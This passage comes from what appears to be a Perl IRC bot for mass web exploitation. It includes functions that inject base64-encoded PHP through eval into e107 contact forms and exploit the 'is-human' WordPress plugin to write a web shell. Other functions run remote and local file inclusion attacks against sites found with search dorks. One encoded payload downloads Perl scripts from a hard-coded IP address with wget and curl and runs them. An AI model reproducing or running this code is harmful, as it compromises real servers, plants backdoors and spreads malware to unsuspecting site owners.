vU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2ltYWdlcy9sb2JleC5waHAnLCd3Jyk7CmZ3cml0ZSgkZmljaGllciwgJGMpOwpmY2xvc2UoJGZpY2hpZXIpOwo=";
  1359.     my $req = HTTP::Request->new(POST => $url);
  1360.     $req->content_type('application/x-www-form-urlencoded');
  1361.     $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
  1362.     my $ua = LWP::UserAgent->new(agent => $uagent);
  1363.     $ua->timeout(7);
  1364.     my $res = $ua->request($req);
  1365.     return $res->content;
  1366. }
  1367.  
  1368. sub e107_spread_query() {
  1369.     my $url = $_[0];
  1370.     my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3O2NkIC90bXA7cm0gLXJmIGRvci4qICoudHh0Lio7ZmV0Y2ggaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O3dnZXQgaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O2N1cmwgLU8gaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O2x3cC1kb3dubG9hZCBodHRwOi8vMjE3LjE2LjguMjMvfndlYm1haWwveG1sLnR4dDtwZXJsIHhtbC50eHQ7Y2QgL3Zhci90bXA7cm0gLXJmIGRvci4qICouanBnLio7ZmV0Y2ggaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O3dnZXQgaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O2N1cmwgLU8gaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O2x3cC1kb3dubG9hZCBodHRwOi8vMjE3LjE2LjguMjMvfndlYm1haWwveHBsLnR4dDtwZXJsIHhwbC50eHQ7IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7ZWNobyAkZXNlZ3VpY21kOw0KZnVuY3Rpb24gZXgoJGNmZSl7DQokcmVzID0gJyc7DQppZiAoIWVtcHR5KCRjZmUpKXsNCmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsNCkBleGVjKCRjZmUsJHJlcyk7DQokcmVzID0gam9pbigiXG4iLCRyZXMpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsNCiRyZXMgPSBAc2hlbGxfZXhlYygkY2ZlKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsNCkBvYl9zdGFydCgpOw0KQHN5c3RlbSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsNCkBvYl9zdGFydCgpOw0KQHBhc3N0aHJ1KCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3BvcGVuJykpew0KJGYgPSBAcG9wZW4oJGNmZSwiciIpOw0Kd2hpbGUoIUBmZW9mKCRjZmUpKSB7ICRyZXMgLj0gQGZyZWFkKCRjZmUsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
  1371.     my $req = HTTP::Request->new(POST => $url);
  1372.     $req->content_type('application/x-www-form-urlencoded');
  1373.     $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
  1374.     my $ua = LWP::UserAgent->new(agent => $uagent);
  1375.     $ua->timeout(7);
  1376.     my $res = $ua->request($req);
  1377. }
  1378.  
  1379. sub ih_exploit() {
  1380.         my $chan = $_[0];
  1381.         my $bug = $_[1];
  1382.         my $simpan = $_[2];
  1383.         my $dork = $_[3];
  1384.         my $engine = $_[4];
  1385.         my $count = 0;
  1386.         my @totexploit = &search_engine($chan,$bug,$dork,$engine,$ihlogo);
  1387.         my $num = scalar(@totexploit);
  1388.         if ($num > 0){
  1389.                 foreach my $site(@totexploit){
  1390.                 $count++;
  1391.                 if ($count == $num-1) { &msg("$chan","$ihlogo15$engine 9Finished 15for 9$dork "); }
  1392.                         my $ihxxx = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2xvYmV4LnBocCcsJ3cnKTsKZndyaXRlKCRmaWNoaWVyLCAkYyk7CmZjbG9zZSgkZmljaGllcik7Cg";
  1393.                         my $ihcek = "JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7CnBhc3N0aHJ1KGlkKTsK";
  1394.                         my $vuln = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihxxx."));error";
  1395.                         my $cekih = "http://".$site.$bug."?action=log-reset&type=ih_options();eval(base64_decode(".$ihcek."));error";
  1396.                         my $shell = "http://".$site."wp-content/plugins/is-human/lobex.php";
  1397.                                 my $coba = &get_content($cekih);
  1398.                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1399.                                 if ($coba =~ /Array<br>(.*?)<br>(.*?)gid=/){ my $uname = $1; my $uid = $2; &get_content($vuln);sleep(1);
  1400.                                         &msg("$chan","$ihlogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
  1401.                                         my $res = &get_content($shell);sleep(1);
  1402.                                         if ($res =~ /UnKnown - Simple Shell/){
  1403.                                                 &msg("$chan","$ihlogo15$engine 4<9=4>9 SheLL 4<9=4>9 $shell ");
  1404.                                                 } else { &msg("$chan","$ihlogo15$engine 4<9=4>9 Vuln 4<9=4>9 $site 4<9=4> Os=$uname $uid");
  1405.                                                 }
  1406.                                         }
  1407.                                 } exit;
  1408.                         }
  1409.                 }
  1410.         }
  1411. }
  1412.  
  1413. sub rfi_exploit() {
  1414.         my $chan = $_[0];
  1415.         my $bug = $_[1];
  1416.         my $simpan = $_[2];
  1417.         my $dork = $_[3];
  1418.         my $engine = $_[4];
  1419.         my $count = 0;
  1420.         my @totexploit = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
  1421.         my $num = scalar(@totexploit);
  1422.         if ($num > 0){
  1423.                 foreach my $site(@totexploit){
  1424.                 $count++;
  1425.                 if ($count == $num-1) { &msg("$chan","$rfilogo15$engine 9Finished 15for 9$dork "); }
  1426.                         my $coba = "http://".$site.$bug."test??";
  1427.                         my $test = "http://".$site.$bug.$injector."??";
  1428.                         my $dor  = "http://".$site.$bug.$botshell."??";
  1429.                                 my $cek  = &get_content($coba);
  1430.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1431.                                 &get_content($dor);sleep(1);
  1432.                                 if ($cek =~ /failed to open stream/) {
  1433.                                         &msg("$chan","$rfilogo15$engine 9e3x9p3l9o3i9t3i9n3g 15http://$site ");
  1434.                                         my $check = &get_content($test);sleep(1);
  1435.                                         if ($check =~ /stunshell/i) {
  1436.                                                 &os2($test,$chan,$engine,$rfilogo);
  1437.                                                 }
  1438.                                         }
  1439.                                 } exit;
  1440.                         }
  1441.                 }
  1442.         }
  1443. }
  1444.  
  1445. sub lfi_exploit() {
  1446.         my $chan = $_[0];
  1447.         my $bug = $_[1];
  1448.         my $simpan = $_[2];
  1449.         my $dork = $_[3];
  1450.         my $engine = $_[4];
  1451.         my $count = 0;
  1452.         my @totexploit = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
  1453.         my $num = scalar(@totexploit);
  1454.         if ($num > 0){
  1455.                 foreach my $site(@totexploit){
  1456.                 $count++;
  1457.                 if ($count == $num-1) { &msg("$chan","$lfilogo15$engine 9Finished 15for 9$dork "); }
  1458.                         my $dir = "../../../../../../../../../../../../../../../../../../../../../../../../";
  1459.                         my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
  1460.                         my $shell = "http://".$site.$bug.$dir."/tmp/lobex%0000";
  1461.                                 my $html = &get_content($test);
  1462.                                 if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1463.                                 if ($html =~ /DOCUMENT_ROOT=\// && $html =~